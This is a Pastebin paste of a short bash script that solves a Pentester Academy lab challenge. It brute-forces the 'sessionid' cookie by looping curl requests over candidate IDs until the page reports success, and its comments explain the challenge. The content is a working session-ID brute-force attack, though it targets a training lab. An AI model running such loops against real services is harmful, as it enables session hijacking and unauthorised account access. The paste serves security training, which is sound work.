Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # run as bash ./script
- # The challenge is about "Session ID", dont waste your time hacking around -I did :(
- # The issue is that the cookie 'sessionid' has random values and controls the authentication.
- # the size of the page is also the same.
- # It is a brute force SessionID attack.
- # Not easy Vivek ;)
- for I in $(seq -w 80 99) #if wanna see all ids, change 80 -> 1
- do
- echo "--- sending id... $I"
- curl --cookie "sessionid=10${I}" -s http://pentesteracademylab.appspot.com/lab/webapp/sid/2 | grep "cracked"
- if [ $? -eq 0 ]; then
- echo "Found it: 10$I"
- break
- fi
- done
- # https://curl.haxx.se/docs/httpscripting.html#Cookie_Basics
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement